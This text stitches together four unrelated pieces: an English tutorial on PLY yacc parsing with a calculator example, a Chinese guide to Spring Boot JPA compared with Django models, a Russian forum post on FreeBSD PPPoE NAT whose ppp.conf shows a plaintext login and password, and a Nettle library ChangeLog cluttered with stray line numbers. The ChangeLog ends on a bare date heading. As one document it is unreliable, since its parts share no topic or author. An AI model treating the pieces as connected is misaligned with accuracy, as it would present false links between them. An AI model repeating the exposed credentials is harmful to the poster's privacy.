Fair warning: Yacc can sometimes be hard to use and debug, every if you know python well.
Keep in mind, you don't have to use both lex and yacc, if you want you can just use lex and then write your own code to parse the tokens.
With that said lets get started.
Yacc basics
Before we get started, delete the lexer testing code (everything from lexer.input onward).
When we run the parser, the lexer is automatially run.
Let's add our first parser rule!
def p_hello(t):
'statement : GREET SPACE NAME'
print(list(t))
print(f"Hello, {t[3]}")
Let's break this down.
Again, we have information on the rule in the docstring.
This information is called a BNF Grammar. A statement in BNF Grammar consists of a grammar rule known as a non-terminal and terminals.
In the example above, statement is the non-terminal and GREET SPACE NAME are terminals.
The left-hand side describes what is produced by the rule, and the right-hand side describes what matches the rule.
The right hand side can also have non-terminals in it, just be careful to avoid infinite loops.
Basically, the yacc parser works by pushing tokens onto a stack, and looking at the current stack and the next token and seeing if they match any rules that it can use to simplify them. Here is a more in-depth explanation and example.
Before the above example can run, we still have to add some more code.
Just like for the lexer, the error handler is required:
def p_error(t):
if t is None: # lexer error, already handled
return
print(f"Syntax Error: {t.value!r}")
Now let's create and run the parser:
parser = yacc.yacc()
parser.parse('greet replit')
If you run this code you should see:
[None, 'greet', ' ', 'replit']
Hello, replit
The first line is the list version of the object passed to the parser function.
The first value is the statement that will be produced from the function, so it is None.
Next, we have the values of the tokens we specified in the rule.
This is where the t[3] part comes from. This is the third item in the array, which is the NAME token, so our parser prints out Hello, replit!
Note: Creating the parser tables is a relatively expensive operation, so the parser creates a file called
parsetab.pywhich it can load the parse tables from if they haven't changed.
You can change this filename by passing a kwarg into theyaccinitialization, likeparser = yacc.yacc(tabmodule='fooparsetab')
More complicated parsing: Calculator
This example is different from our running example, so I will just show a full code example and explain it.
from ply import lex, yacc
tokens = (
'NUMBER',
'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LPAREN', 'RPAREN',
)
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print(f"Integer value too large: {t.value}")
t.value = 0
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
t_ignore = ' \t'
lexer = lex.lex()
# Parsing
def p_expression_binop(t):
'''expression : expression PLUS expression
| expression MINUS expression
| expression TIMES expression
| expression DIVIDE expression'''
if t[2] == '+' : t[0] = t[1] + t[3]
elif t[2] == '-': t[0] = t[1] - t[3]
elif t[2] == '*': t[0] = t[1] * t[3]
elif t[2] == '/': t[0] = t[1] / t[3]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_error(t):
if t is None: # lexer error
return
print(f"Syntax Error: {t.value!r}")
parser = yacc.yacc()
if __name__ == "__main__":
while True:
inp = input("> ")
print(parser.parse(inp))
First we start off with the tokens: numbers, mathematical operations, and parenthesis.
You might notice that I didn't use the reserved_tokens trick, but you can implement it if you want.
Next we have a simple number token which matches 0-9 with \d+ and then converts its value from a string to an integer.
The next code we haven't used before is t_ignore.
This variable represents a list of all characters the lexer should ignore, which is \t which means spaces and tabs.
When the lexer sees these, it will just skip them. This allows users to add spaces without it affecting the lexer.
Now we have 3 parser directives.
The first is a large one, producing an expression from 4 possible input values, one for each math operation.
Each input has an expression on either side of the math operator.
Inside this directive, we have some (pretty ugly) code that performs the correct operation based on the operation token given.
If you want to make this prettier, consider a dictionary using the python stdlib operator module.
Next, we define an expression with parenthesis around it as being the same as the expression inside.
This makes parenthesis value be substituted in for them, making them evaluate inside first.
With very little code we created a very complicated rule that can deal with nested parenthesis correctly.
Finally, we define a number as being able to be an expression, which allows a number to be used as one of the expressions in rule 1.
For a challenge, try adding variables into this calculator!
You should be able to set variables by using syntax likevarname = any_expressionand you should be able to use variables in expressions.
If you're stuck, see one solution from the PLY docs.
Thats it!
Thanks for reading! If you have questions, feel free to ask on the Replit discord's #help-and-reviews channel, or just the comments.
Have fun!
|
介绍
JPA (Java Persistence API) 是 Sun 官方提出的 Java 持久化规范。它为 Java 开发人员提供了一种对象/关联映射工具来管理 Java 应用中的关系数据。他的出现主要是为了简化现有的持久化开发工作和整合 ORM 技术,结束现在 Hibernate,TopLink,JDO 等 ORM 框架各自为营的局面。值得注意的是,JPA 是在充分吸收了现有 Hibernate,TopLink,JDO 等ORM框架的基础上发展而来的,具有易于使用,伸缩性强等优点。从目前的开发社区的反应上看,JPA 受到了极大的支持和赞扬
JPA(Java Persistence API)是一套规范,不是一套产品,那么像Hibernate,TopLink,JDO他们是一套产品,如果说这些产品实现了这个JPA规范,那么我们就可以叫他们为JPA的实现产品。
Hibernate是完备的ORM框架,是符合JPA规范的,MyBatis没有按照JPA那套规范实现。目前Spring以及SpringBoot官方都没有针对MyBatis有具体的支持,但对Hibernate的集成一直是有的。但这并不是说mybatis和spring无法集成,MyBatis官方社区自身也是有对Spring,Springboot集成做支持的,所以在技术上,两者都不存在问题。
ORM:对象-关系表映射,在代码中的对象与数据库操作封装一层,隐藏SQL查询语句。我最早是通过Django接触到这个概念的,简直被惊艳到了,设计模型与数据库表爽到爆。这里看看springboot中的ORM怎么用。
添加依赖
<!--spring-data-jpa 依赖包--> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-jpa</artifactId> </dependency> <!-- mysql --> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>5.1.21</version> </dependency>
为了后面设计模型方便,可以添加lombok:
<dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId></dependency>
创建实体模型Model
import lombok.Getter; import lombok.Setter; import org.hibernate.annotations.GenericGenerator; import javax.persistence.*; import java.io.Serializable; @Entity @Table(name = "role") @Setter @Getter public class Role implements Serializable { public Role() { } public Role(String name) { this.name = name; } @Id @GeneratedValue(strategy=GenerationType.AUTO) private Long id; private String name; }
@Setter和@Getter就是使用了lombok的注解功能,可以使得代码写得简单些。
@Entity注解指定当前类为一个模型,后面我们可以对比下Django的模型设计
@Table注解指定当前模型创建的数据表名
创建实体操作类Repository
import org.springframework.data.jpa.repository.JpaRepository; import org.springframework.stereotype.Repository; @Repository public interface RoleRepository extends JpaRepository<Role, Long> { Role findById(String id); }
创建Service接口
import com.example.demo_jpa.model.Role; import java.util.List; public interface RoleService { Role save(Role role); List<Role> findAll(); }
Service实现
import com.example.demo_jpa.model.Role; import com.example.demo_jpa.model.RoleRepository; import org.springframework.stereotype.Service; import javax.annotation.Resource; import java.util.List; @Service public class RoleServiceImpl implements RoleService { @Resource private RoleRepository roleRepository; @Override public Role save(Role role) { return roleRepository.save(role); } @Override public List<Role> findAll() { return roleRepository.findAll(); } }
运行
运行Application后数据表会自动生成。
对比Django
举一个Django中的模型设计例子:
class Device(models.Model): ''' 设备 ''' vm_choice = ( (-1, '未知'), (0, '否'), (1, '是'), ) mac = models.CharField(max_length=32, verbose_name='MAC地址', null=True) disk = models.CharField(max_length=128, verbose_name='硬盘ID', null=True) ip = models.CharField(max_length=32, verbose_name='IP地址', blank=True) vm = models.IntegerField(choices=vm_choice, default=-1, verbose_name='是否虚拟环境') def __str__(self): return self.mac class Meta: db_table = 'device' verbose_name = '机器设备' verbose_name_plural = verbose_name unique_together = ('mac', 'disk')
继承自models.Model就是一个模型
成员变量就表的一个个列
db_table指定当前模型创建的数据表名
verbose_name指定在管理后台显示的名称
verbose_name_plural指定在管理后台显示的名称(复数)
对比下发现其实都差不多。
|
Помогите разобраться с NAT'ом для PPPoE
2008-02-23 11:56:40
Хоть у нас на Украине, долбанное правительство, которое постоянно что-то отменяет и меняет... Мы все по прежнему отмечаем этот праздник, для нас он был есть и будет! и никакие Ющенки этого не изменят...
Вот пришел я в этот замечательный день на работу, по своей воле. Пока никого нет, можно потыкать и подергать инет. И все ж разобраться как же оно устроено
Мне помогают FreePascal и proxy-man, за что я им очень признателен. Но я немогу их постоянно терроризировать вопросами в личку, поэтому решил написать сюды. А вопрос собственно такой:
Есть провайдер Укртелеком, с соединение РРРоЕ, со стороны провайдера DHCP.
Мои конфиги:
Код: Выделить всё
server# cat /etc/rc.conf
font8x14="cp866-8x14"
font8x16="cp866b-8x16"
font8x8="cp866-8x8"
keymap="ru.koi8-r"
keyrate="fast"
mousechar_start="3"
moused_enable="NO"
moused_type="NO"
saver="blank"
scrnmap="koi8-r2cp866"
sshd_enable="YES"
inetd_enable="YES"
usbd_enable="NO"
ifconfig_xl0="inet 192.168.0.250 netmask 255.255.255.0"
hostname="server.work"
ppp_enable="YES"
ppp_mode="ddial"
#ppp_nat="YES"
ppp_profile="adsl"
ppp_user="root"
#gateway_enable="YES"
#natd_enable="YES"
#natd_interface="tun0"
#natd_flags="-m"
firewall_enable="YES"
firewall_script="/etc/rc.firewall"
firewall_type="OPEN"
firewall_logging="YES"
tcp_drop_synfin="YES"
Код: Выделить всё
server# cat /etc/ppp/ppp.conf
default:
adsl:
set device PPPoE:rl0
set MTU 1492
set MRU 1492
set dial
set crtscts off
accept lqr
disable deflate
disable pred1
disable vjcomp
disable acfcomp
disable protocomp
set log Phase LCP IPCP CCP Warning Error Alert
set ifaddr 10.0.0.1/0 10.0.0.2/0 0.0.0.0 0.0.0.0
add default HISADDR
set login
set authname tundra
set authkey tundra
enable dns
# nat enable yes
# nat log on
# nat same_ports yes
# nat unregistered_only yes
# nat deny_incoming no
Код: Выделить всё
server# ifconfig
rl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=8<VLAN_MTU>
ether 00:02:44:71:b2:f0
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
xl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=9<RXCSUM,VLAN_MTU>
inet 192.168.0.250 netmask 0xffffff00 broadcast 192.168.0.255
ether 00:04:76:99:5b:a6
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet 127.0.0.1 netmask 0xff000000
tun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1492
inet 80.90.231.66 --> 80.90.236.2 netmask 0xffffffff
Opened by PID 320
Код: Выделить всё
server# ping www.ua
PING nic.net.ua (193.239.250.34): 56 data bytes
64 bytes from 193.239.250.34: icmp_seq=0 ttl=57 time=21.968 ms
64 bytes from 193.239.250.34: icmp_seq=1 ttl=57 time=18.646 ms
64 bytes from 193.239.250.34: icmp_seq=2 ttl=57 time=23.343 ms
^C
--- nic.net.ua ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max/stddev = 18.646/21.319/23.343/1.972 ms
|
NewerOlder
1 2
2002-05-14 Niels Möller <niels@s3.kth.se>
3 4
* x86/aes-encrypt.asm (aes_encrypt): Replaced first quarter of the
round function with an invocation of AES_ROUND.
5 6
(aes_encrypt): Similarly for the second column.
(aes_encrypt): Similarly for the rest of the round function.
7 8 9
* x86/machine.m4 (AES_ROUND): New macro.
10 11 12 13 14 15 16 17
* x86/aes-encrypt.asm (aes_encrypt): Use AES_LOAD macro.
* x86/machine.m4 (AES_LOAD): New macro.
* x86/aes-encrypt.asm (aes_encrypt): Use AES_STORE.
* x86/machine.m4 (AES_STORE): New macro.
18 19
* x86/aes-encrypt.asm (aes_encrypt): Use the AES_LAST_ROUND macro
for the first column of the final round.
20 21
(aes_encrypt): Similarly for the second column.
(aes_encrypt): Similarly for the third and fourth column.
22
23 24 25
26 27
* x86/machine.m4 (AES_LAST_ROUND): New macro.
28 29 30 31 32 33
* x86/aes-encrypt.asm (aes_encrypt): Move code here...
* x86/aes.asm: ...from here.
* x86/aes.asm: Use addl and subl, not add and sub. Replaced
references to dtbl1-4 with references to _aes_encrypt_table.
34 35
* configure.ac (asm_path): Enable x86 assembler.
36 37 38
* x86/aes.asm (aes_decrypt): Adapted to the current interface.
Notably, the order of the subkeys was reversed. Single block
encrypt/decrypt works now.
39 40
41
42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
2002-05-07 Niels Möller <niels@s3.kth.se>
* configure.ac: Generate config.m4.
* x86/aes.asm: Use C for comments, include the tables using
include_src, and commented out the key setup functions.
Fixed the processing of the first handling of the round function.
Now, encryption of a single block works! Multiple blocks, and
decryption, is still broken.
* x86/machine.m4: New file (empty).
* x86/aes-encrypt.asm: New file, empty for now.
* Makefile.am (%.asm): Added asm.m4, machine.m4 and config.m4 to
the m4 command line.
(libnettle_a_SOURCES): Added aes-encrypt-table.c.
* sparc/aes.asm: No need to include asm.m4, that is taken care of
by the Makefile.
* config.m4.in: New file, configuration for asm.m4.
* asm.m4 (C, include_src): New macros.
* aes-encrypt-table.c: New file, table moved out from
aes-encrypt.c.
70 71 72 73
2002-05-06 Niels Möller <niels@s3.kth.se>
* configure.ac (CFLAGS): Don't enable -Waggregate-return.
74 75 76 77
2002-05-05 Niels Möller <nisse@lysator.liu.se>
* configure.ac: Pass no arguments to AM_INIT_AUTOMAKE.
78 79 80 81 82 83
2002-05-05 Niels Möller <nisse@cuckoo.hack.org>
* configure.ac: Update for automake-1.6.
* configure.ac: Renamed file, used to be configure.in.
84 85 86 87
2002-03-20 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/run-tests (test_program): Added missing single quote.
88 89 90 91 92
2002-03-20 Niels Möller <nisse@lysator.liu.se>
* testsuite/run-tests (test_program): Test the exit status of the
right process.
93 94 95 96
2002-03-19 Pontus Sköld <pont@it.uu.se>
* testsuite/run-tests: Removed /bin/bashisms to use with /bin/sh.
97 98 99 100 101
2002-03-18 Niels Möller <nisse@cuckoo.hack.org>
* rsa-keygen.c (rsa_generate_keypair): Output a newline after a
non-empty line of 'e':s (bad e was chosen, try again).
102 103 104 105 106
2002-03-16 Niels Möller <nisse@cuckoo.hack.org>
* configure.in (asm_path): AC_CONFIG_LINKS adds $srcdir
automatically.
107
2002-03-14 Niels Möller <nisse@cuckoo.hack.org>
108
109 110 111 112 113 114
* sparc/aes.asm, x86/aes.asm: Added copyright notice.
* Makefile.am (libnettle_a_SOURCES): Added aes-internal.h.
(EXTRA_DIST): Added assembler files.
* configure.in (asm_path): Use $srcdir when looking for the files.
115
* configure.in (asm_path): For now, disable x86 assembler code.
116
117
118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155
2002-02-25 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Moved increment of src into the
source_loop. Also fixed stop condition, the loop was run 5 times,
not 4, as it should.
(_aes_crypt): Use src directly when accessing the source data,
don't use %o5.
(_aes_crypt): Renamed variables in source_loop.
(_aes_crypt): Changed stop condition in source_loop to not depend
on i. Finally reduced the source_loop to 16 instructions. Also
increased the alignment of the code to 16.
(_aes_crypt): In final_loop, use preshifted indices.
(_aes_crypt): In final_loop, construct the result in t0. Use t0-t3
for intermediate values.
(_aes_crypt): In final_loop, use the register idx.
(_aes_crypt): In final_loop, keep i multiplied by 4. Use key to
get to the current roundkey.
(_aes_crypt): In final_loop, use i for indexing.
(_aes_crypt): Update dst in the output loop. This yields a delay
slot that isn't filled yet.
(_aes_crypt): Decrement round when looping, saving yet some
instructions.
(_aes_crypt): Reformatted code as blocks of four instructions
each.
(_aes_crypt): Copy the addresses of the indexing tables into
registers at the start. No more need for the idx register.
(_aes_crypt): Deleted idx register.
(_aes_crypt): Some peep hole optimizations, duplicating some
instructions to fill nop:s, and put branch instructions on even
word addresses.
2002-02-22 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Moved some more additions out of the
inner loop, using additional registers.
(_aes_crypt): Deleted one more addition from the inner loop, by
using the subkey pointer.
156 157 158 159 160
2002-02-19 Niels Möller <nisse@cuckoo.hack.org>
* configure.in (asm_path): Renamed "path" to "asm_path". Also look
for a machine.m4.
161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232
2002-02-16 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm: Use that IDX2(j) == j ^ 2
* Makefile.am (libnettle_a_SOURCES): Reordered aes-decrypt.c and
aes-encrypt.c. For some strange reason it makes the benchmark go
faster...
* sparc/aes.asm (_aes_crypt): Use double-buffering, and no
separate loop for adding the round key.
(round): Keep round index muliplied by 16, so it can be used
directly for indexing the subkeys.
(_aes_crypt): In the final loop, use ctx+round to access the
subkeys, no need for an extra register.
2002-02-15 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Renaming variables, allocating
locals starting from %l0.
(_aes_crypt): Consistently use %l4, aka i, as the variable for the
innermost loops.
(_aes_crypt): Moved reading of ctx->nrounds out of the loop.
(_aes_crypt): In final_loop, deleted a redundant mov, and use i as
loop variable.
(_aes_crypt): Started renumbering registers in the inner loop. The
computation for the table[j] sub-expression should be kept in
register %o[j].
(_aes_crypt): Renamed more variables in the inner loop. Now the
primary variables are t0, t1, t2, t3.
* sparc/aes.asm (_aes_crypt): Swapped register %i0 and %o5, %i1
and %o0, %i2 and %o4, %i3 and %o3, %i4 and %o2.
(_aes_crypt): wtxt was stored in both %l1 and %l2 for the entire
function. Freed %l2 for other uses.
(_aes_crypt): Likewise for tmp, freeing register %o1.
* sparc/machine.m4: New file, for sparc-specific macros.
* sparc/aes.asm (_aes_crypt): Hacked the source_loop, to get rid
of yet another redundant loop variable, and one instruction.
(_aes_crypt): Strength reduce loop variable in the
inner loop, getting rid of one register.
(_aes_crypt): Use pre-shifted indices (aes_table.idx_shift), to
avoid some shifts in the inner loop.
(_aes_crypt): Don't check for nrounds==0 at the start of the loop.
* asm.m4: Define and use structure-defining macros.
* Makefile.am (%.asm): Use a GNU pattern rule, to make %.o depend
on both %.asm and asm.m4.
* aes-internal.h (struct aes_table): New subtable idx_shift.
Updated tables in aes_encrypt.c and aes_decrypt.c.
* asm.m4: Use eval to compute values.
* sparc/aes.asm (_aes_crypt): Deleted commented out old version of
the code.
* asm.m4: Added constants for individual rows of the aes table.
* aes.c (IDX0, IDX1, IDX2, IDX3): New macros, encapsualting the
structure of the idx table.
* asm.m4: Define various aes struct offsets.
* testsuite/cbc-test.c (test_cbc_bulk): Use aes_set_encrypt_key
and aes_set_decrypt_key.
* sparc/aes.asm (_aes_crypt): Use symbolic names for the fucntion
arguments.
233 234
2002-02-14 Niels Möller <nisse@cuckoo.hack.org>
235 236 237 238 239 240 241 242 243 244 245 246 247
* sparc/aes.asm: Copied gcc assembler code for _aes_crypt.
* aesdata.c: New program for generating AES-related tables.
* testsuite/testutils.c (print_hex): New function (moved from
yarrow-test.c).
* testsuite/rsa-keygen-test.c (progress): Declare the ctx argument
as UNUSED.
* testsuite/cbc-test.c (test_cbc_bulk): New function, testing CBC
with larger blocks.
248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278
* yarrow256.c: Replaced uses of aes_set_key with
aes_set_encrypt_key.
* nettle-meta.h (_NETTLE_CIPHER_SEP): New macro, useful for
algorithms with separate encyption and decryption key setup.
* aes-internal.h (struct aes_table): New structure, including all
constant tables needed by the unified encryption or decryption
function _aes_crypt.
* aes.c (_aes_crypt): New function, which unifies encryption and
decryption.
AES key setup now uses two separate functions for setting
encryption and decryption keys. Applications that don't do
decryption need no inverted subkeys and no code to generate them.
Similarly, the tables (about 4K each for encryption and
decryption), are put into separate files.
* aes.h (struct aes_ctx): Deleted space for inverse subkeys. For
decryption, the inverse subkeys replace the normal subkeys, and
they are stored _in the order they are used_.
* aes-set-key.c (aes_set_key): Deleted file, code moved...
* aes-set-decrypt-key.c, aes-set-encrypt-key.c: New files,
separated normal and inverse key setup.
* aes-tables.c: Deleted, tables moved elsewhere...
* aes-encrypt.c, aes-decrypt.c: New files; moved encryption and
decryption funktions, and needed tables, into separate files.
279 280 281 282 283 284 285 286 287 288 289 290 291
2002-02-13 Niels Möller <nisse@cuckoo.hack.org>
* aes.c (aes_encrypt): Don't unroll the innerloop.
(aes_encrypt): Don't unroll the loop for the final round.
(aes_decrypt): Likewise, no loop unrolling.
* aes-set-key.c (aes_set_key): Reversed the order of the inverted
subkeys. They are now stored in the same order as they are used.
* aes-tables.c (itable): New bigger table, generated by aesdata.c.
* aes.c (aes_decrypt): Rewrote to use the bigger tables.
292 293
2002-02-12 Niels Möller <nisse@cuckoo.hack.org>
294 295 296 297 298 299 300 301 302 303 304 305
* aes.c (aes_encrypt): Interleave computation and output in the
final round.
* aes-internal.h (AES_SMALL): New macro.
* aes.c (aes_encrypt): Optionally use smaller rotating inner loop.
* aes-tables.c (dtbl): Replaced with table generated by aesdata.
* aes.c (aes_encrypt): Rewrite, now uses larger tables in order to
avoid rotates.
306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366
* sparc/aes.asm (aes_encrypt): Strength reduced on j, getting rid
of one register and one instruction in the inner loop.
* sparc/aes.asm (idx, aes_encrypt): Multiplied tabled values by 4,
making it possible to get rid of some shifts in the inner loop.
* configure.in: Fixed spelling of --enable-assembler. Commented
out debug echo:s.
* asm.m4: New file. For now, only doing changequote and changecom.
* sparc/aes.asm (aes_encrypt): Added comments.
(aes_encrypt): Cut off redundant instruction per block, also
saving one redundant register pointing to idx.
(idx_row): New macro. Include asm.m4.
2002-02-11 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (key_addition_8to32): Cleaned up.
Deleted gcc-generated debugging information.
* sparc/aes.asm (key_addition32): First attempt at optimization.
Made it slower ;-)
* sparc/aes.asm (key_addition32): Unrolled loop, gained 4%
speed, payed four instructions compared to gcc
generated code.
* Makefile.am (.asm.o): New rule for assembling via m4.
(libnettle_a_SOURCES): Added new rsa and aes files.
* configure.in: New command line option --enable-assembler.
Selects assembler code depending on the host system.
* rsa-decrypt.c, rsa-encrypt.c: New files for rsa pkcs#1
encryption.
* aes-set-key.c, aes-tables.c: New files, split off from aes.c.
Tables are now not static, but use a _aes_ prefix on their names.
* aes-internal.h: New file.
* cast128-meta.c (_NETTLE_CIPHER_FIX): Use _NETTLE_CIPHER_FIX.
* cbc.c (cbc_decrypt_internal): New function, doing the real CBC
procesing and requiring that src != dst.
(cbc_decrypt): Use cbc_decrypt_internal. If src == dst, use a
buffer of limited size to copy the ciphertext.
* nettle-internal.c (nettle_blowfish128): Fixed definition, with
key size in bits.
* nettle-meta.h (_NETTLE_CIPHER_FIX): New macro, suitable for
ciphers with a fixed key size.
* examples/nettle-benchmark.c (display): New function for
displaying the results, including MB/s figures.
* sparc/aes.asm: New file. Not yet tuned in any way (it's just the
code generated by gcc).
367 368 369 370 371
2002-02-11 Niels Möller <nisse@lysator.liu.se>
* x86/aes.asm, x86/aes_tables.asm: New assembler implementation by
Rafael Sevilla.
372 373 374 375 376 377 378 379 380 381 382 383 384 385
2002-02-06 Niels Möller <nisse@cuckoo.hack.org>
Applied patch from Dan Egnor improving the base64 code.
* base64.h (BASE64_ENCODE_LENGTH): New macro.
(struct base64_ctx): New context struct, for decoding.
(BASE64_DECODE_LENGTH): New macro.
* base64.c (base64_decode_init): New function.
(base64_decode_update): New function, replacing base64_decode.
Takes a struct base64_ctx argument.
* nettle-meta.h: Updated nettle_armor, and related typedefs and
macros.
* testsuite/testutils.c (test_armor): Updated.
* configure.in: Use AC_PREREQ(2.50).
386 387 388 389
2002-02-01 Niels Möller <nisse@cuckoo.hack.org>
* Released nettle-1.5.
390 391 392 393 394
2002-01-31 Niels Möller <nisse@cuckoo.hack.org>
* acinclude.m4: Commented out gmp-related macros, they're probably
not needed anymore.
395 396 397 398 399 400 401 402
2002-01-31 Niels Möller <nisse@lysator.liu.se>
* configure.in: Added command line options --with-lib-path and
--with-include-path. Use the RPATH-macros to get correct flags for
linking the test programs with gmp.
* acinclude.m4: New file.
403 404 405 406 407 408 409 410 411 412 413
2002-01-31 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Randomness): New subsection on Yarrow.
2002-01-30 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Randomness): New chapter.
Spell checking and ispell configuration.
* md5.c: Added reference to RFC 1321.
414 415 416 417
2002-01-24 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Public-key algorithms): Minor fixes.
418 419 420 421 422 423
2002-01-22 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Nettle soup): New chapter.
(Hash functions): New subsection on struct nettle_hash.
(Hash functions): New subsection on struct nettle_cipher.
(Keyed hash functions): New section, describing MAC:s and HMAC.
424
(Public-key algorithms): New chapter.
425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441
* testsuite/testutils.c (test_armor): New function.
* testsuite/base64-test.c: New testcase.
* testsuite/Makefile.am (TS_PROGS): Added base64-test.
* nettle-meta.h (struct nettle_armor): New struct.
* configure.in: Bumped version to 1.5.
* Makefile.am (libnettle_a_SOURCES): Added base64 files, and some
missing header files.
* base64.c, base64.h, base64-meta.c: New files, hacked by Dan
Egnor.
442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471
2002-01-16 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c: Deleted ran_array code, use
knuth-lfib.h instead.
* testsuite/testutils.c (test_rsa_md5, test_rsa_sha1): Moved
functions here...
* testsuite/rsa-test.c: ...from here.
* testsuite/rsa-keygen-test.c: New file.
* testsuite/knuth-lfib-test.c: New file.
* Makefile.am (libnettle_a_SOURCES): Added knuth-lfib.c and
rsa-keygen.c.
* rsa-keygen.c: New file.
* rsa.h (RSA_MINIMUM_N_OCTETS): New constant.
(RSA_MINIMUM_N_BITS): New constant.
(nettle_random_func, nettle_progress_func): New typedefs. Perhaps
they don't really belong in this file.
(rsa_generate_keypair): Added progress-callback argument.
* macros.h (READ_UINT24, WRITE_UINT24, READ_UINT16, WRITE_UINT16):
New macros.
* knuth-lfib.c, knuth-lfib.h: New files, implementing a
non-cryptographic prng.
472 473 474 475
2002-01-15 Niels Möller <nisse@cuckoo.hack.org>
* hmac-sha1.c: New file.
476 477
2002-01-14 Niels Möller <nisse@cuckoo.hack.org>
478 479
480 481 482 483 484 485 486 487 488 489 490
* testsuite/hmac-test.c (test_main): Added hmac-sha1 test cases.
* rsa.c (rsa_init_private_key, rsa_clear_private_key): Handle d.
* rsa.h (struct rsa_private_key): Reintroduced d attribute, to be
used only for key generation output.
(rsa_generate_keypair): Wrote a prototype.
* Makefile.am (libnettle_a_SOURCES): Added hmac-sha1.c and
nettle-internal.h.
491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537
* des.c: Use static const for all tables.
(des_set_key): Use a new const * variable for the parity
procesing, for constness reasons.
* list-obj-sizes.awk: New file.
* nettle-internal.c, nettle-internal.h: New files.
* testsuite/Makefile.am (TS_PROGS): Added hmac-test. Deleted old
m4-stuff.
* testsuite/testutils.h (LDATA): Moved this macro here,...
* testsuite/rsa-test.c: ... from here.
* testsuite/hmac-test.c: New file.
* hmac.h: General cleanup. Added declarations of hmac-md5,
hmac-sha1 and hmac-sha256.
* hmac.c: Bug fixes.
* hmac-md5.c: First working version.
* Makefile.am (libnettle_a_SOURCES): Added hmac.c and hmac-md5.c.
(libnettleinclude_HEADERS): Added hmac.h.
* testsuite/rsa-test.c: Also test a 777-bit key.
* rsa.c (rsa_check_size): Changed argument to an mpz_t. Updated
callers.
(rsa_prepare_private_key): Compute the size of the key by
computing n = p * q.
* rsa-compat.c: Adapted to new private key struct.
* rsa_md5.c: Likesize.
* rsa_sha1.c: Likesize.
* rsa.c (rsa_check_size): New function, for computing and checking
the size of the modulo in octets.
(rsa_prepare_public_key): Usa rsa_check_size.
(rsa_init_private_key): Removed code handling n, e and d.
(rsa_clear_private_key): Likewise.
(rsa_compute_root): Always use CRT.
* rsa.h (struct rsa_private_key): Deleted public key and d from
the struct, as they are not needed. Added size attribute.
538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567
2002-01-12 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am: Added *-meta files.
* rsa.c (rsa_init_public_key): New function.
(rsa_clear_public_key): Likewise.
(rsa_init_private_key): Likewise.
(rsa_clear_private_key): Likewise.
* aes-meta.c: New file.
* arcfour-meta.c: New file.
* cast128-meta.c: New file.
* serpent-meta.c: New file.
* twofish-meta.c: New file.
* examples/nettle-benchmark.c: Use the interface in nettle-meta.h.
2002-01-11 Niels Möller <nisse@cuckoo.hack.org>
Don't use m4 for generating test programs, it's way overkill. Use
the C preprocessor instead.
* testsuite/*-test.c: New file.
* hmac.c, hmac.h, hmac-md5.c: New files.
Defined structures describing the algoriths. Useful for code that
wants to treat an algorithm as a black box.
* nettle-meta.h, md5-meta.c, sha1-meta.c, sha256-meta.c: New
files.
568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599
2002-01-09 Niels Möller <nisse@cuckoo.hack.org>
